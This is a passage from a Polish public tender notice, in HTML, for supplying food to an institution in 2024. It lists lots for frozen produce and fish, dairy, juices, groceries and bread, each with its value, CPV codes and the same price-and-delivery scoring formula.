jadłospisem.<br/>Zamawiający zobowiązuje się do zlecenia dostaw w/w przedmiocie zamówienia do wysokości min. 60 % wartości brutto<br/>wskazanej w Formularzu ofertowym wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-04-05 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) sposób dostawy (T) – 40%<br/> <br/>2. Sposób oceniania ofert:<br/>1) Kryterium &#34;cena&#34;<br/>W kryterium cena (C), w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najkorzystniejszy wskaźnik (cena), zostanie zastosowany następujący wzór:<br/><br/> <br/> Cn<br/> Liczba zdobytych punktów (C) = ----- x 100 pkt x waga kryterium 60%<br/> Cb<br/>Gdzie :<br/> Cn - cena najniższa wśród ofert nieodrzuconych<br/> Cb - cena oferty badanej<br/> 60% - procentowe znaczenie kryterium ceny.-60 pkt.ZP<br/><br/><br/>Liczba punktów, którą można uzyskać w ramach tego kryterium, obliczona zostanie przez podzielenie ceny najniższej z oferowanych przez cenę oferty badanej/ocenianej i pomnożenie tak otrzymanej liczby przez 100 pkt i wagę kryterium, którą ustalono na 60%.<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2023r. poz. 1570 z późn. zm.) dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. Wykonawca, składając ofertę, zobowiązany jest:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2)	wskazać nazwy (rodzaje) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazać wartość towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4)	wskazać stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/> <br/>2)	Kryterium „sposób dostawy” (Sd)<br/>Wniesienie do magazynu– 40 PKT<br/>Siedziba placówki parter bez wniesienia do magazynu – 0 PKT<br/><br/>W przypadku gdy Wykonawca w formularzu ofertowym nie wskaże drugiego kryterium Zamawiający przyjmie, iż jest to sposób wskazany jako „Siedziba placówki parter bez wniesienia do magazynu” Wykonawca otrzyma – 0 punktów (dotyczy wszystkich części).<br/><br/>Zamawiający za najkorzystniejszą uzna ofertę z najwyższym bilansem uzyskanych punktów określonych przez Zamawiającego kryteriach wg wzoru:<br/><br/> L = C + Sd<br/> Gdzie :<br/>	L – sumaryczna liczba punktów oferty badanej,<br/>	C – punkty w kryterium cena,<br/>	Sd- punkty w kryterium sposób dostawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) Kryterium „sposób dostawy” (Sd) Wniesienie do magazynu– 40 PKT Siedziba placówki parter bez wniesienia do magazynu – 0 PKT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część NR 3 MROŻONE WARZYWA I OWOCE, RYBY MROŻONECzęść Numer 3 mrożonki – owoce, warzywa odpowiednio mrożone, owoce i warzywa niepokruszone, z niewielką ilością lodu, ryby mrożone odpowiednio całe, zapach smak świeży, po odmrożeniu nie rozpadają się, bez glazury SHP. Maksymalny ubytek masy nie może przekroczyć 2% . </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 2064,04 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15330000-0 - Przetworzone owoce i warzywa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zrealizowania Umowy do wartości niższej niż określona w Formularzu ofertowym<br/>(ograniczenia zakresu zamówienia), w zależności od faktycznych potrzeb Zamawiającego, wynikających ze zmieniającej się<br/>liczby podopiecznych korzystających z wyżywienia, zmiany ilości poszczególnych produktów wymaganych jadłospisem.<br/>Zamawiający zobowiązuje się do zlecenia dostaw w/w przedmiocie zamówienia do wysokości min. 60 % wartości brutto<br/>wskazanej w Formularzu ofertowym wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-04-05 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) sposób dostawy (T) – 40%<br/> <br/>2. Sposób oceniania ofert:<br/>1) Kryterium &#34;cena&#34;<br/>W kryterium cena (C), w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najkorzystniejszy wskaźnik (cena), zostanie zastosowany następujący wzór:<br/><br/> <br/> Cn<br/> Liczba zdobytych punktów (C) = ----- x 100 pkt x waga kryterium 60%<br/> Cb<br/>Gdzie :<br/> Cn - cena najniższa wśród ofert nieodrzuconych<br/> Cb - cena oferty badanej<br/> 60% - procentowe znaczenie kryterium ceny.-60 pkt.ZP<br/><br/><br/>Liczba punktów, którą można uzyskać w ramach tego kryterium, obliczona zostanie przez podzielenie ceny najniższej z oferowanych przez cenę oferty badanej/ocenianej i pomnożenie tak otrzymanej liczby przez 100 pkt i wagę kryterium, którą ustalono na 60%.<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2023r. poz. 1570 z późn. zm.) dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. Wykonawca, składając ofertę, zobowiązany jest:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2)	wskazać nazwy (rodzaje) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazać wartość towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4)	wskazać stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/> <br/>2)	Kryterium „sposób dostawy” (Sd)<br/>Wniesienie do magazynu– 40 PKT<br/>Siedziba placówki parter bez wniesienia do magazynu – 0 PKT<br/><br/>W przypadku gdy Wykonawca w formularzu ofertowym nie wskaże drugiego kryterium Zamawiający przyjmie, iż jest to sposób wskazany jako „Siedziba placówki parter bez wniesienia do magazynu” Wykonawca otrzyma – 0 punktów (dotyczy wszystkich części).<br/><br/>Zamawiający za najkorzystniejszą uzna ofertę z najwyższym bilansem uzyskanych punktów określonych przez Zamawiającego kryteriach wg wzoru:<br/><br/> L = C + Sd<br/> Gdzie :<br/>	L – sumaryczna liczba punktów oferty badanej,<br/>	C – punkty w kryterium cena,<br/>	Sd- punkty w kryterium sposób dostawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) Kryterium „sposób dostawy” (Sd) Wniesienie do magazynu– 40 PKT Siedziba placówki parter bez wniesienia do magazynu – 0 PKT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część NR 4 PRODUKTY MLECZARSKIE nabiał - świeżość, dobry smak po otwarciu produktów, niezbrylone sery naturalne, gęste jogurty </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 25616,58 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zrealizowania Umowy do wartości niższej niż określona w Formularzu ofertowym<br/>(ograniczenia zakresu zamówienia), w zależności od faktycznych potrzeb Zamawiającego, wynikających ze zmieniającej się<br/>liczby podopiecznych korzystających z wyżywienia, zmiany ilości poszczególnych produktów wymaganych jadłospisem.<br/>Zamawiający zobowiązuje się do zlecenia dostaw w/w przedmiocie zamówienia do wysokości min. 60 % wartości brutto<br/>wskazanej w Formularzu ofertowym wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-04-05 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) sposób dostawy (T) – 40%<br/> <br/>2. Sposób oceniania ofert:<br/>1) Kryterium &#34;cena&#34;<br/>W kryterium cena (C), w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najkorzystniejszy wskaźnik (cena), zostanie zastosowany następujący wzór:<br/><br/> <br/> Cn<br/> Liczba zdobytych punktów (C) = ----- x 100 pkt x waga kryterium 60%<br/> Cb<br/>Gdzie :<br/> Cn - cena najniższa wśród ofert nieodrzuconych<br/> Cb - cena oferty badanej<br/> 60% - procentowe znaczenie kryterium ceny.-60 pkt.ZP<br/><br/><br/>Liczba punktów, którą można uzyskać w ramach tego kryterium, obliczona zostanie przez podzielenie ceny najniższej z oferowanych przez cenę oferty badanej/ocenianej i pomnożenie tak otrzymanej liczby przez 100 pkt i wagę kryterium, którą ustalono na 60%.<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2023r. poz. 1570 z późn. zm.) dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. Wykonawca, składając ofertę, zobowiązany jest:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2)	wskazać nazwy (rodzaje) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazać wartość towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4)	wskazać stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/> <br/>2)	Kryterium „sposób dostawy” (Sd)<br/>Wniesienie do magazynu– 40 PKT<br/>Siedziba placówki parter bez wniesienia do magazynu – 0 PKT<br/><br/>W przypadku gdy Wykonawca w formularzu ofertowym nie wskaże drugiego kryterium Zamawiający przyjmie, iż jest to sposób wskazany jako „Siedziba placówki parter bez wniesienia do magazynu” Wykonawca otrzyma – 0 punktów (dotyczy wszystkich części).<br/><br/>Zamawiający za najkorzystniejszą uzna ofertę z najwyższym bilansem uzyskanych punktów określonych przez Zamawiającego kryteriach wg wzoru:<br/><br/> L = C + Sd<br/> Gdzie :<br/>	L – sumaryczna liczba punktów oferty badanej,<br/>	C – punkty w kryterium cena,<br/>	Sd- punkty w kryterium sposób dostawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) Kryterium „sposób dostawy” (Sd) Wniesienie do magazynu– 40 PKT Siedziba placówki parter bez wniesienia do magazynu – 0 PKT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Numer 5 soki- naturalnie mętny sok, tłoczony wyłącznie z polskich jabłek z dodatkiem innych owoców i warzyw </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 5728 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15321000-4 - Soki owocowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zrealizowania Umowy do wartości niższej niż określona w Formularzu ofertowym<br/>(ograniczenia zakresu zamówienia), w zależności od faktycznych potrzeb Zamawiającego, wynikających ze zmieniającej się<br/>liczby podopiecznych korzystających z wyżywienia, zmiany ilości poszczególnych produktów wymaganych jadłospisem.<br/>Zamawiający zobowiązuje się do zlecenia dostaw w/w przedmiocie zamówienia do wysokości min. 60 % wartości brutto<br/>wskazanej w Formularzu ofertowym wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-04-05 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) sposób dostawy (T) – 40%<br/> <br/>2. Sposób oceniania ofert:<br/>1) Kryterium &#34;cena&#34;<br/>W kryterium cena (C), w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najkorzystniejszy wskaźnik (cena), zostanie zastosowany następujący wzór:<br/><br/> <br/> Cn<br/> Liczba zdobytych punktów (C) = ----- x 100 pkt x waga kryterium 60%<br/> Cb<br/>Gdzie :<br/> Cn - cena najniższa wśród ofert nieodrzuconych<br/> Cb - cena oferty badanej<br/> 60% - procentowe znaczenie kryterium ceny.-60 pkt.ZP<br/><br/><br/>Liczba punktów, którą można uzyskać w ramach tego kryterium, obliczona zostanie przez podzielenie ceny najniższej z oferowanych przez cenę oferty badanej/ocenianej i pomnożenie tak otrzymanej liczby przez 100 pkt i wagę kryterium, którą ustalono na 60%.<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2023r. poz. 1570 z późn. zm.) dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. Wykonawca, składając ofertę, zobowiązany jest:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2)	wskazać nazwy (rodzaje) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazać wartość towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4)	wskazać stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/> <br/>2)	Kryterium „sposób dostawy” (Sd)<br/>Wniesienie do magazynu– 40 PKT<br/>Siedziba placówki parter bez wniesienia do magazynu – 0 PKT<br/><br/>W przypadku gdy Wykonawca w formularzu ofertowym nie wskaże drugiego kryterium Zamawiający przyjmie, iż jest to sposób wskazany jako „Siedziba placówki parter bez wniesienia do magazynu” Wykonawca otrzyma – 0 punktów (dotyczy wszystkich części).<br/><br/>Zamawiający za najkorzystniejszą uzna ofertę z najwyższym bilansem uzyskanych punktów określonych przez Zamawiającego kryteriach wg wzoru:<br/><br/> L = C + Sd<br/> Gdzie :<br/>	L – sumaryczna liczba punktów oferty badanej,<br/>	C – punkty w kryterium cena,<br/>	Sd- punkty w kryterium sposób dostawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) Kryterium „sposób dostawy” (Sd) Wniesienie do magazynu– 40 PKT Siedziba placówki parter bez wniesienia do magazynu – 0 PKT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część NR 6 PRODUKTY SPOŻYWCZEprzyprawy zapach świeży po otwarciu produktów, bez oznak spleśnienia, grudek, produkty gotowane sypkie, bez sklejania się twarde sprężyste, produkty z puszek bez pleśni, mętnej konsystencji. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 18260,66 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zrealizowania Umowy do wartości niższej niż określona w Formularzu ofertowym<br/>(ograniczenia zakresu zamówienia), w zależności od faktycznych potrzeb Zamawiającego, wynikających ze zmieniającej się<br/>liczby podopiecznych korzystających z wyżywienia, zmiany ilości poszczególnych produktów wymaganych jadłospisem.<br/>Zamawiający zobowiązuje się do zlecenia dostaw w/w przedmiocie zamówienia do wysokości min. 60 % wartości brutto<br/>wskazanej w Formularzu ofertowym wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-04-05 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) sposób dostawy (T) – 40%<br/> <br/>2. Sposób oceniania ofert:<br/>1) Kryterium &#34;cena&#34;<br/>W kryterium cena (C), w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najkorzystniejszy wskaźnik (cena), zostanie zastosowany następujący wzór:<br/><br/> <br/> Cn<br/> Liczba zdobytych punktów (C) = ----- x 100 pkt x waga kryterium 60%<br/> Cb<br/>Gdzie :<br/> Cn - cena najniższa wśród ofert nieodrzuconych<br/> Cb - cena oferty badanej<br/> 60% - procentowe znaczenie kryterium ceny.-60 pkt.ZP<br/><br/><br/>Liczba punktów, którą można uzyskać w ramach tego kryterium, obliczona zostanie przez podzielenie ceny najniższej z oferowanych przez cenę oferty badanej/ocenianej i pomnożenie tak otrzymanej liczby przez 100 pkt i wagę kryterium, którą ustalono na 60%.<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2023r. poz. 1570 z późn. zm.) dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. Wykonawca, składając ofertę, zobowiązany jest:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2)	wskazać nazwy (rodzaje) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazać wartość towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4)	wskazać stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/> <br/>2)	Kryterium „sposób dostawy” (Sd)<br/>Wniesienie do magazynu– 40 PKT<br/>Siedziba placówki parter bez wniesienia do magazynu – 0 PKT<br/><br/>W przypadku gdy Wykonawca w formularzu ofertowym nie wskaże drugiego kryterium Zamawiający przyjmie, iż jest to sposób wskazany jako „Siedziba placówki parter bez wniesienia do magazynu” Wykonawca otrzyma – 0 punktów (dotyczy wszystkich części).<br/><br/>Zamawiający za najkorzystniejszą uzna ofertę z najwyższym bilansem uzyskanych punktów określonych przez Zamawiającego kryteriach wg wzoru:<br/><br/> L = C + Sd<br/> Gdzie :<br/>	L – sumaryczna liczba punktów oferty badanej,<br/>	C – punkty w kryterium cena,<br/>	Sd- punkty w kryterium sposób dostawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) Kryterium „sposób dostawy” (Sd) Wniesienie do magazynu– 40 PKT Siedziba placówki parter bez wniesienia do magazynu – 0 PKT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> pieczywo – Skóra pieczywa ściśle połączona z miękiszem, błyszcząca, gładka lub w miejscach po nacięciach chropowata, o barwie od złocistej do jasnobrązowe. Miękisz o dość równomiernej porowatości i równomiernym zabarwieniu, suchy w dotyku o dobrej krajalności; miękisz po lekkim nacisku powinien wrócić do stanu pierwotnego bez deformacji struktury; nie dopuszcza się wyrobów o miękiszu lepkim, niedopieczonym, z zakalcem, kruszącym się, zanieczyszczonym, z obecnością grudek mąki lub soli. Smak i zapach typowy dla tego rodzaju pieczywa, niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Niedopuszczalne wyroby zdeformowane, zgniecione, zabrudzone, spalone, ze śladami pleśni </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 12383,80 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15811000-6 - Pieczywo</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zrealizowania Umowy do wartości niższej niż określona w Formularzu ofertowym<br/>(ograniczenia zakresu zamówienia), w zależności od faktycznych potrzeb Zamawiającego, wynikających ze zmieniającej się<br/>liczby podopiecznych korzystających z wyżywienia, zmiany ilości poszczególnych produktów wymaganych jadłospisem.<br/>Zamawiający zobowiązuje się do zlecenia dostaw w/w przedmiocie zamówienia do wysokości min. 60 % wartości brutto<br/>wskazanej w Formularzu ofertowym wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-04-05 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) sposób dostawy 